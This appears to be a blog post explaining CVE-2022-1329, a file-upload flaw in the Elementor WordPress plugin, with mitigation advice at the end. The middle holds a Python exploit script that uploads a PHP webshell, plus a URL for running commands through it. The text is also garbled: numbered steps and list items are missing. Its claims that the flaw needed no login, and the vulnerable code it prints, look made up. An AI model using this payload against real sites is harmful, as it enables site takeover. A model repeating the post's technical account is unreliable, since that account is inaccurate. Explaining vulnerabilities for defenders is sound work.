CVE-2022-1329 - Critical Remote Code Execution Flaw in Elementor Website Builder Plugin for WordPress

In today’s post, we’ll dive deep into CVE-2022-1329, a severe vulnerability in the very popular Elementor Website Builder WordPress plugin. This flaw allowed attackers to bypass authentication, exploit insecure AJAX endpoints, modify site data, and even upload malicious files leading to full remote code execution (RCE) — putting millions of WordPress sites at risk between versions 3.6. and 3.6.2.

This is an exclusive, step-by-step breakdown, including references, code snippets, technical explanation, and demonstration of exploitation – written in simple, accessible language.

What Is CVE-2022-1329?

CVE-2022-1329 is a vulnerability discovered in April 2022 affecting the Elementor plugin, particularly its AJAX handling in /core/app/modules/onboarding/module.php. This flaw was caused by *missing capability checks* before executing sensitive actions. In simple terms: Elementor didn’t properly check if a user actually had permission before allowing them to use some powerful tools under the hood.

Perform sensitive site changes

- Upload arbitrary/malicious files

The Root Cause: Missing Capability Check

The Elementor plugin registered several AJAX actions for onboarding users. These AJAX functions were accessible by unauthenticated users because they didn’t check for the right WordPress capability (such as manage_options or edit_posts). So any one – even someone not logged in – could call these functions via a simple HTTP request.

In ~/core/app/modules/onboarding/module.php

add_action( 'wp_ajax_elementor_onboarding_upload_file', [ $this, 'onboarding_upload_file' ] );
add_action( 'wp_ajax_nopriv_elementor_onboarding_upload_file', [ $this, 'onboarding_upload_file' ] ); // <--- PROBLEM!

No capability check is performed in onboarding_upload_file

public function onboarding_upload_file() {
    // NO current_user_can() check
    // Process file upload
    // ...
}

This means anyone (not just logged-in admins, but any visitor) can fire off POST requests to execute this function.

How Exploitation Works

1. Attacker crafts a malicious AJAX call, sending a POST request to the onboarding file upload endpoint.

The file is written to the server in a web-accessible location.

4. Attacker accesses the shell through the browser, gaining control of the site/server.

Here’s a simple Python script to exploit this vulnerability and upload a webshell

import requests

url = "https://victim.com/wp-admin/admin-ajax.php?action=elementor_onboarding_upload_file";
files = {
    'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}
response = requests.post(url, files=files)

print("Status:", response.status_code)
print("Response body:", response.text)

This script uploads a PHP file containing a simple shell. Once uploaded, the attacker can execute shell commands by accessing:

https://victim.com/wp-content/uploads/onboarding/shell.php?cmd=whoami

Alter site data: AJAX actions allowed for modification of various site options and content.

- Upload arbitrary files: Often leading to code execution (RCE), defacement, spam, or total site compromise.
- Install backdoors or full webshells, persistently controlling the site and using it for further attacks.

Patching and Mitigation

The Elementor team reacted quickly by fixing the issue in version 3.6.3. They added capability checks to all affected endpoints.

Replace all admin passwords

- Scan your site for malware (using plugins like Wordfence or Sucuri)

References and Further Reading

- Wordfence Advisory: Unauthenticated RCE in Elementor (CVE-2022-1329)
- NIST NVD - CVE-2022-1329
- Patchstack Database Entry

Summary

CVE-2022-1329 is a classic exmaple of missing authorization in web applications — with devastating results. The Elementor plugin’s oversight in protecting its AJAX actions made millions of WordPress sites vulnerable to complete takeover. The key takeaway: always update plugins promptly, use security solutions, and never trust input from unauthenticated sources.

Check your site, update Elementor, and stay safe!

Do you have questions or want to know more about WordPress plugin security? Leave a comment below!

Timeline

Published on: 04/19/2022 21:15:00 UTC
Last modified on: 04/27/2022 17:33:00 UTC